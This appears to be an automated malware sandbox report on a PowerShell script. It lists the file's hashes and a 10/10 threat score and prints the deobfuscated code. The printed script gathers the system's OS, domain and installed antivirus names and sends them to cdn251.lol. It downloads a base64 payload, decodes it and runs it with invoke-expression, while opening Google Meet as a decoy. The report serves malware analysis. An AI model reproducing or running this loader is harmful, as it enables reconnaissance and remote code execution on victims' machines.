Overview

overview

10

Static

static

10

f4052e52fe...b5.ps1

windows7-x64

3

f4052e52fe...b5.ps1

windows10-2004-x64

3

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5.ps1

  • Size

    2KB

  • MD5

    797992ab276d218d7feb2e6e8b2fd678

  • SHA1

    99cfbecaebc79e723603997fb2102363319103eb

  • SHA256

    f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5

  • SHA512

    702007e1ea9df25b54d996a8fcfea344812bd58f5fe70b1e7d1ba528ee1968148536c7a4c8bcd8e22d2087d539485fcd63e639449f1243cea62d513d82952479

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$tsu = start-job -scriptblock {$tojnrfynzfvhghjjeatkcmx = (get-wmiobject -class win32_operatingsystem).caption, $zxquastizc = "25", $rwahcfhhgcv = "ff4fbe21-02b8-45f5-b5ab-42fa6a1cec01", $qykeahwbjypm = [system.net.webutility]::urlencode($tojnrfynzfvhghjjeatkcmx), $qmxknzbooxjsidx = get-wmiobject win32_computersystem|select-object -expandproperty domain, $kquckngc = get-wmiobject -namespace "root\\SecurityCenter2" -class antivirusproduct, $ztvdn = $kquckngc|%{$_.displayname}, $rbbkcuguwik = $ztvdn -join ", ", $gg = "w", $k = new-guid.tostring(), $skehhlokjcaampj = new-object net.webclient, ($skehhlokjcaampj.headers).add("User-Agent", "myUserAgentHere"), $okflyzxcusbnfwvaq = "?dnrfahca=$rbbKcuGuWIK&KBNqDGNqaeqyqaCz=$qMXknZBOOXJSidX&jtPCbNFlNabPPEiFiHyvHgu=$qYKEAHwBjYPm&HfKVWACyCWmHU=$($ZXQUastIZC)&SunLGYEARVktztLG=$rWaHcFHHgcv&File=file&siOHQbxZZdt=$gg&tMDrrMJJuxLLkxxvZAwkHykMn=$K", $dnlqx = "https://cdn251.lol/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61" + "$($oKflyzXCUsbNfWVAq)", $hpckuedgcmf = $skehhlokjcaampj.downloadstring($dnlqx), $cfssdhomsqwzrun = ([system.text.encoding]::unicode).getstring([system.convert]::frombase64string($hpckuedgcmf)), $mvussbghokltiqu = "usradm", try {
2
invoke-expression $cfssdhomsqwzrun
3
} catch {
4
$pszbonzfod = $_.exception.message
5
$xdomplpagktxgmzna = "?tMDrrMJJuxLLkxxvZAwkHykMn=$($K)&UxjPbyxEvOIwrPK=$($PSzBoNzfoD)"
6
$mjzwzclrk = "https://cdn251.lol/223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0" + "$($XdOmPLPagKTXgmZna)"
7
$hpckuedgcmf = $skehhlokjcaampj.downloadstring($mjzwzclrk)
8
}
9
}
10
$secjlpfqfqimrcxfcnqrwpk = "https://meet.google.com/"
11
start-process "https://meet.google.com/"
12
receive-job -job $tsu -wait
13
URLs
exe.dropper

https://meet.google.com/

Signatures

Files

  • f4052e52fed661fd05ea39a5187781ec6c234c5d7ea4ab91cd77f2e1d2c709b5.ps1
    .ps1

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.